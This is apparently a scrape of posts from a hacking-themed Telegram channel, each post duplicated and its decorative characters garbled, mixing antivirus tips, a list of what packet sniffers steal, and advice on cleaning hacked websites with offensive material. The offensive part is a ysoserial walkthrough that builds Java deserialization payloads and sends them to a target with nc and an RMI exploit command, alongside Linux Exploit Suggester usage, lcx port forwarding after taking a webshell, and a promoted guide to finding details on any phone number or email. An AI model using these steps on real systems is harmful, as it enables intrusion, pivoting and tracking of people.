β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Eight basic principles to stay away from viruses:
1. Establish good security habits. For example: Do not open some emails and attachments of unknown origin, do not go to some unknown websites, do not execute software that is downloaded from the Internet without anti-virus treatment, etc. These necessary habits will make you The computer is more secure.
2. Turn off or delete unnecessary services in the system . By default, many operating systems will install some auxiliary services, such as FTP client, Telnet, and Web server. These services provide convenience for attackers, but are not of much use to users. If they are deleted, the possibility of being attacked can be greatly reduced.
3. Update security patches frequently. According to statistics, 80% of network viruses spread through system security vulnerabilities , such as Worm King, Shockwave, Sasser, etc., so we should regularly download the latest security patches from the Microsoft website to prevent Before it happens. γγ
4. Using complex passwords Many network viruses attack the system by guessing simple passwords. Therefore, using complex passwords will greatly improve the security of the computer.
5. Quickly isolate the infected computer. When your computer finds a virus or abnormality, you should disconnect it immediately to prevent the computer from being infected more or becoming a source of transmission and infecting other computers again.
6. Know some virus knowledge so that you can discover new viruses in time and take corresponding measures to protect your computer from virus damage at critical moments. If you can understand some registry knowledge, you can regularly check whether there are suspicious keys in the registry's self-starting items; if you understand some memory knowledge, you can often check whether there are suspicious programs in the memory.
7. It is best to install professional anti-virus software for comprehensive monitoring. With the increasing number of viruses today, using anti-virus software for anti-virus is an increasingly economical choice. However, after installing anti-virus software, users should frequently upgrade and change some The main monitoring is often opened (such as mail monitoring), memory monitoring, etc., and problems should be reported, so as to truly protect the security of the computer.
8. Users should also install personal firewall software to prevent hacking. Due to the development of the Internet, hacker attacks on usersβ computers are becoming more and more serious. Many network viruses use hackers to attack usersβ computers. Therefore, users should also install Personal firewall software, set the security level to medium or high, so as to effectively prevent hacker attacks on the network.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Eight basic principles to stay away from viruses:
1. Establish good security habits. For example: Do not open some emails and attachments of unknown origin, do not go to some unknown websites, do not execute software that is downloaded from the Internet without anti-virus treatment, etc. These necessary habits will make you The computer is more secure.
2. Turn off or delete unnecessary services in the system . By default, many operating systems will install some auxiliary services, such as FTP client, Telnet, and Web server. These services provide convenience for attackers, but are not of much use to users. If they are deleted, the possibility of being attacked can be greatly reduced.
3. Update security patches frequently. According to statistics, 80% of network viruses spread through system security vulnerabilities , such as Worm King, Shockwave, Sasser, etc., so we should regularly download the latest security patches from the Microsoft website to prevent Before it happens. γγ
4. Using complex passwords Many network viruses attack the system by guessing simple passwords. Therefore, using complex passwords will greatly improve the security of the computer.
5. Quickly isolate the infected computer. When your computer finds a virus or abnormality, you should disconnect it immediately to prevent the computer from being infected more or becoming a source of transmission and infecting other computers again.
6. Know some virus knowledge so that you can discover new viruses in time and take corresponding measures to protect your computer from virus damage at critical moments. If you can understand some registry knowledge, you can regularly check whether there are suspicious keys in the registry's self-starting items; if you understand some memory knowledge, you can often check whether there are suspicious programs in the memory.
7. It is best to install professional anti-virus software for comprehensive monitoring. With the increasing number of viruses today, using anti-virus software for anti-virus is an increasingly economical choice. However, after installing anti-virus software, users should frequently upgrade and change some The main monitoring is often opened (such as mail monitoring), memory monitoring, etc., and problems should be reported, so as to truly protect the security of the computer.
8. Users should also install personal firewall software to prevent hacking. Due to the development of the Internet, hacker attacks on usersβ computers are becoming more and more serious. Many network viruses use hackers to attack usersβ computers. Therefore, users should also install Personal firewall software, set the security level to medium or high, so as to effectively prevent hacker attacks on the network.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Usually the content that sniffer cares about can be divided into the following categories:
1. Password
I think this is the reason for the vast majority of illegal use of sniffer, sniffer can record the userid and passwd transmitted in plain text. Even if you use encryption during network transmission Data, like the data recorded by sniffer, may make the intruder try to figure out your algorithm while eating skewers at home.
2. Financial account
Many users are at ease using their credit card or cash account on the Internet, but sniffers can easily intercept the user name, password, credit card number, expiration date, account number, and pin sent online.
3. Peeping confidential or sensitive information and data
through interception Data packets, intruders can easily record the transfer of sensitive information between others, or simply intercept the entire email conversation process.
4. Spy on low-level protocol information.
This is a terrible thing, I think, by recording the underlying information protocol, such as recording the network interface address between two hosts, the remote network interface ip address, ip routing information, and the byte order number of the tcp connection.
> This information will pose a great harm to network security after being held by an illegal intruder. Usually someone uses sniffers to collect this information for only one reason: he is conducting a fraud, (usually ip address fraud requires you to accurately insert the tcp connection Byte order number, which will be pointed out in a future article) If someone is very concerned about this issue, then the sniffer is just a prelude to him, and the future problems will be much bigger.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Usually the content that sniffer cares about can be divided into the following categories:
1. Password
I think this is the reason for the vast majority of illegal use of sniffer, sniffer can record the userid and passwd transmitted in plain text. Even if you use encryption during network transmission Data, like the data recorded by sniffer, may make the intruder try to figure out your algorithm while eating skewers at home.
2. Financial account
Many users are at ease using their credit card or cash account on the Internet, but sniffers can easily intercept the user name, password, credit card number, expiration date, account number, and pin sent online.
3. Peeping confidential or sensitive information and data
through interception Data packets, intruders can easily record the transfer of sensitive information between others, or simply intercept the entire email conversation process.
4. Spy on low-level protocol information.
This is a terrible thing, I think, by recording the underlying information protocol, such as recording the network interface address between two hosts, the remote network interface ip address, ip routing information, and the byte order number of the tcp connection.
> This information will pose a great harm to network security after being held by an illegal intruder. Usually someone uses sniffers to collect this information for only one reason: he is conducting a fraud, (usually ip address fraud requires you to accurately insert the tcp connection Byte order number, which will be pointed out in a future article) If someone is very concerned about this issue, then the sniffer is just a prelude to him, and the future problems will be much bigger.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
5 h vote, Suggest us / you want in next posts :
Anonymous Poll
35%
More exploits guides ?
13%
More related to sniffing attacks ?
16%
Updates for termux/linux tools ?
19%
Some tips for beginers ?
17%
Others(courses/pdfs..)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦LES: Linux privilege escalation auditing tool:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1)DOWNLOAD :
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
> Details about LES usage and inner workings:
https://mzet-.github.io/2019/05/10/les-paper.html
Additional resources for the LES:
https://github.com/mzet-/les-res
2) cd dir
3) $ ./linux-exploit-suggester.sh
4) For each exploit, exposure is calculated. Following 'Exposure' states are possible:
1οΈβ£Highly probable - assessed kernel is most probably affected and there's a very good chance that PoC exploit will work out of the box without any major modifications.
2οΈβ£Probable - it's possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target.
3οΈβ£Less probable - additional manual analysis is needed to verify if kernel is affected.
4οΈβ£Unprobable - highly unlikely that kernel is affected (exploit is not displayed in the tool's output)
5) Verifying state of kernel hardening security measures
LES can check for most of security settings available by your Linux kernel. It verifies not only the kernel compile-time configurations (CONFIGs) but also verifies run-time settings (sysctl) giving more complete picture of security posture for running kernel. This functionality is modern continuation of --kernel switch from checksec.sh tool by Tobias Klein. Example of tool output:
$ ./linux-exploit-suggester.sh --checksec
6) Assess exposure of the Linux box on publicly known exploits:
$ ./linux-exploit-suggester.sh
Show state of security features on the Linux box:
$ ./linux-exploit-suggester.sh --checksec
Assess exposure of Linux kernel on publicly known exploits based on the provided 'uname' string (i.e. output of uname -a command):
$ ./linux-exploit-suggester.sh --uname <uname-string>
USE FOR LEARN !!!
verified @UndercodeTesting
β git topic
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦LES: Linux privilege escalation auditing tool:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1)DOWNLOAD :
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
> Details about LES usage and inner workings:
https://mzet-.github.io/2019/05/10/les-paper.html
Additional resources for the LES:
https://github.com/mzet-/les-res
2) cd dir
3) $ ./linux-exploit-suggester.sh
4) For each exploit, exposure is calculated. Following 'Exposure' states are possible:
1οΈβ£Highly probable - assessed kernel is most probably affected and there's a very good chance that PoC exploit will work out of the box without any major modifications.
2οΈβ£Probable - it's possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target.
3οΈβ£Less probable - additional manual analysis is needed to verify if kernel is affected.
4οΈβ£Unprobable - highly unlikely that kernel is affected (exploit is not displayed in the tool's output)
5) Verifying state of kernel hardening security measures
LES can check for most of security settings available by your Linux kernel. It verifies not only the kernel compile-time configurations (CONFIGs) but also verifies run-time settings (sysctl) giving more complete picture of security posture for running kernel. This functionality is modern continuation of --kernel switch from checksec.sh tool by Tobias Klein. Example of tool output:
$ ./linux-exploit-suggester.sh --checksec
6) Assess exposure of the Linux box on publicly known exploits:
$ ./linux-exploit-suggester.sh
Show state of security features on the Linux box:
$ ./linux-exploit-suggester.sh --checksec
Assess exposure of Linux kernel on publicly known exploits based on the provided 'uname' string (i.e. output of uname -a command):
$ ./linux-exploit-suggester.sh --uname <uname-string>
USE FOR LEARN !!!
verified @UndercodeTesting
β git topic
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - mzet-/les-res: Additional resources and references for linux-exploit-suggester.sh
Additional resources and references for linux-exploit-suggester.sh - mzet-/les-res
Find_Details_Of_any_Mobile_Number,_Email_ID,_IP_Address_in_the_world.pdf
2.5 MB
Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step) #Highrequested
Forwarded from UNDERCODE NEWS
The world's largest ATM makers, Diebold Nixdorf and NCR, have released software updates for their devices.
#Vulnerabilities
#Vulnerabilities
Forwarded from UNDERCODE NEWS
University of Utah officials said the university has recently been compelled to pay hackers $457,059 to avoid leaking of student records #Leaks
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#EXPLOITATION :
> ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) downloadf https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
2) $ java -jar ysoserial.jar
3) Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
4) $ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
0000570: 0078 7071 007e 003a .xpq.~.:
5) $ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
6) $ nc 10.10.10.10 1099 < groovypayload.bin
7) $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
π¦R E Q U I R E M E N T S :
Requires Java 1.7+ and Maven 3.x+
mvn clean package -DskipTests
VERIFIED @undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#EXPLOITATION :
> ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) downloadf https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
2) $ java -jar ysoserial.jar
3) Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
4) $ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
0000570: 0078 7071 007e 003a .xpq.~.:
5) $ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
6) $ nc 10.10.10.10 1099 < groovypayload.bin
7) $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
π¦R E Q U I R E M E N T S :
Requires Java 1.7+ and Maven 3.x+
mvn clean package -DskipTests
VERIFIED @undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What should I do if the website is hacked and injected into the blog color page
Whenever there are competitions such as the European Cup, the World Cup, and the Olympic Games, various gaming groups resort to their best efforts to hack normal websites, especially high-traffic information websites. Through internal testing, Baidu found that the number of sites hacked during the European Cup is on the rise. Baidu has increased the efficiency and intensity of punishment. So, how can we avoid being hacked as a site?
[Self-check whether it has been hacked]
1. The hacked website has a feature in the data, that is, the amount of index and the traffic brought from search engines have increased dramatically in a short period of time . Therefore, the webmaster can benefit from the index volume tool of the Baidu webmaster platform to observe whether there is an abnormality in the siteβs inclusion volume; if a sudden increase is found, use the traffic and keyword tool to check whether the keywords obtained are related to the website, whether it involves gambling and pornography .
2. Query the site through Site grammar, and combine some common pornographic and gambling keywords to achieve better results. It is possible to find illegal pages that do not belong to the site.
3. Due to the huge traffic of Baidu, some hacked behaviors only redirect the traffic brought by Baidu, which is difficult for the webmaster to find. Therefore, when checking whether your site is hacked, you must click on the site page from the Baidu search results to view Did you jump to other sites?
4. The content of the site is shown as risky in the search results.
*Subsequently, you can ask website technicians to further confirm whether the website is hacked through background data and programs
[How to deal with after being hacked]
After confirming that the website is hacked, in addition to prompting technical staff to make quick corrections, SEO staff also need to do some after-care and preventive work.
1. Immediately stop the website service to prevent users from continuing to be affected and prevent other sites from continuing to be affected (recommended to use the 503 return code).
2. If multiple sites of the same hosting provider are hacked during the same period, you can contact the hosting provider to urge the other party to respond.
3. Clean up the discovered hacked content, set the hacked page as a 404 dead link, and submit it through the dead link submission tool of the Baidu webmaster platform.
4. Check out the possible hacking time, compare it with the file modification time on the server, and deal with the files uploaded and modified by hackers; check the user management settings in the server to confirm whether there are abnormal changes; change the user of the server Access password. Note: The possible hacking time can be determined from the access log. However, the hacker may also modify the server's access log.
5. Do a good job in security, check the loopholes in the website, and prevent it from being hacked again.
The above is the processing method of the website being hacked into the blog color page.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What should I do if the website is hacked and injected into the blog color page
Whenever there are competitions such as the European Cup, the World Cup, and the Olympic Games, various gaming groups resort to their best efforts to hack normal websites, especially high-traffic information websites. Through internal testing, Baidu found that the number of sites hacked during the European Cup is on the rise. Baidu has increased the efficiency and intensity of punishment. So, how can we avoid being hacked as a site?
[Self-check whether it has been hacked]
1. The hacked website has a feature in the data, that is, the amount of index and the traffic brought from search engines have increased dramatically in a short period of time . Therefore, the webmaster can benefit from the index volume tool of the Baidu webmaster platform to observe whether there is an abnormality in the siteβs inclusion volume; if a sudden increase is found, use the traffic and keyword tool to check whether the keywords obtained are related to the website, whether it involves gambling and pornography .
2. Query the site through Site grammar, and combine some common pornographic and gambling keywords to achieve better results. It is possible to find illegal pages that do not belong to the site.
3. Due to the huge traffic of Baidu, some hacked behaviors only redirect the traffic brought by Baidu, which is difficult for the webmaster to find. Therefore, when checking whether your site is hacked, you must click on the site page from the Baidu search results to view Did you jump to other sites?
4. The content of the site is shown as risky in the search results.
*Subsequently, you can ask website technicians to further confirm whether the website is hacked through background data and programs
[How to deal with after being hacked]
After confirming that the website is hacked, in addition to prompting technical staff to make quick corrections, SEO staff also need to do some after-care and preventive work.
1. Immediately stop the website service to prevent users from continuing to be affected and prevent other sites from continuing to be affected (recommended to use the 503 return code).
2. If multiple sites of the same hosting provider are hacked during the same period, you can contact the hosting provider to urge the other party to respond.
3. Clean up the discovered hacked content, set the hacked page as a 404 dead link, and submit it through the dead link submission tool of the Baidu webmaster platform.
4. Check out the possible hacking time, compare it with the file modification time on the server, and deal with the files uploaded and modified by hackers; check the user management settings in the server to confirm whether there are abnormal changes; change the user of the server Access password. Note: The possible hacking time can be determined from the access log. However, the hacker may also modify the server's access log.
5. Do a good job in security, check the loopholes in the website, and prevent it from being hacked again.
The above is the processing method of the website being hacked into the blog color page.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦lcx usage experience (piracy)
example Why do port forwarding?
If an external network server, we can access it directly by connecting to its port without port forwarding.
Generally we are divided into four situations:
1. Intranet of this machine: It can be directly connected to the external network of the machine, for example, when we browse the website, connect in time Port 80 of the external network server;
2. External network of this machine: external network of other machine ----------------------------same as the above example;
3. External network of this machine: Intranet of other machine -------------------------If we open port 3389 of its server after getting the webshell, but when We connected to its port 3389 but couldn't connect to it. At this time, experienced people should have checked the status of the server and got webshell-check ipconfig. Everyone understands this, so I won't explain it! This is the second highlight of what I want to talk about: At this time, our idea is to forward its 3389 port. At this time, we will use lcx.exe.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦lcx usage experience (piracy)
example Why do port forwarding?
If an external network server, we can access it directly by connecting to its port without port forwarding.
Generally we are divided into four situations:
1. Intranet of this machine: It can be directly connected to the external network of the machine, for example, when we browse the website, connect in time Port 80 of the external network server;
2. External network of this machine: external network of other machine ----------------------------same as the above example;
3. External network of this machine: Intranet of other machine -------------------------If we open port 3389 of its server after getting the webshell, but when We connected to its port 3389 but couldn't connect to it. At this time, experienced people should have checked the status of the server and got webshell-check ipconfig. Everyone understands this, so I won't explain it! This is the second highlight of what I want to talk about: At this time, our idea is to forward its 3389 port. At this time, we will use lcx.exe.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#FastTips effective popular ways for hack accounts :
1) Attacks at the software level
Injection of malware into the user's system or exploitation of vulnerabilities in existing software. This is still the most widespread and effective hacking method. The proliferation of antiviruses, built-in firewalls, forced inclusion of UAC, auto-updates, increasing the overall security of the OS somewhat improves the situation, but cannot 100% protect users from their own rash actions.
2) Attacks at the traffic level
There are two types of such attacks - in the form of a sniffer of unprotected traffic and in the form of attacks on protected traffic (man in the middle, MITM).
a- This method of hacking is more effective than the first one, but it is more difficult in technical implementation, therefore it has not become so widespread. First of all, due to the limited territoriality - the attack must be carried out directly on the incoming and outgoing connections, and for this you need to physically have access to them.
b-. The second method is that a secure connection occurs, but not between the user certificate and the server certificate, but between the attacker and the server (hence the name MITM - man-in-the-middle attack). After the implementation of the "necessary" certificate, the compromised traffic is available to the hacker in decrypted form, which allows him to extract and save credentials from it.
By the way, both of these methods are also used at the software level: when malware replaces a certificate or a software sniffer is running locally.
3) User-level attacks
Social engineering techniques, in other words, deliberately deceiving a user in order to obtain credentials. The victim is misled when communicating via Internet channels or the phone, after which she herself transfers everything necessary to the attacker. Despite the high labor costs, such an attack is very effective in obtaining a specific user account.
4) Attack at the server (service provider) level
An extremely rare type of attack. It is theoretically possible, but in practice it is extremely rare. Here it is worth debunking the popular myth about βthe social network was hackedβ: in such a situation, it was not the social network that was hacked, but the devices of a particular user. And, most likely, he himself helped the attacker in this, and the hacker used the trick from point 1 or a combination of tricks 1 and 3. Therefore, such a scenario as "hacked social networks", the user need not be afraid, but should be more attentive to their own actions.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#FastTips effective popular ways for hack accounts :
1) Attacks at the software level
Injection of malware into the user's system or exploitation of vulnerabilities in existing software. This is still the most widespread and effective hacking method. The proliferation of antiviruses, built-in firewalls, forced inclusion of UAC, auto-updates, increasing the overall security of the OS somewhat improves the situation, but cannot 100% protect users from their own rash actions.
2) Attacks at the traffic level
There are two types of such attacks - in the form of a sniffer of unprotected traffic and in the form of attacks on protected traffic (man in the middle, MITM).
a- This method of hacking is more effective than the first one, but it is more difficult in technical implementation, therefore it has not become so widespread. First of all, due to the limited territoriality - the attack must be carried out directly on the incoming and outgoing connections, and for this you need to physically have access to them.
b-. The second method is that a secure connection occurs, but not between the user certificate and the server certificate, but between the attacker and the server (hence the name MITM - man-in-the-middle attack). After the implementation of the "necessary" certificate, the compromised traffic is available to the hacker in decrypted form, which allows him to extract and save credentials from it.
By the way, both of these methods are also used at the software level: when malware replaces a certificate or a software sniffer is running locally.
3) User-level attacks
Social engineering techniques, in other words, deliberately deceiving a user in order to obtain credentials. The victim is misled when communicating via Internet channels or the phone, after which she herself transfers everything necessary to the attacker. Despite the high labor costs, such an attack is very effective in obtaining a specific user account.
4) Attack at the server (service provider) level
An extremely rare type of attack. It is theoretically possible, but in practice it is extremely rare. Here it is worth debunking the popular myth about βthe social network was hackedβ: in such a situation, it was not the social network that was hacked, but the devices of a particular user. And, most likely, he himself helped the attacker in this, and the hacker used the trick from point 1 or a combination of tricks 1 and 3. Therefore, such a scenario as "hacked social networks", the user need not be afraid, but should be more attentive to their own actions.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β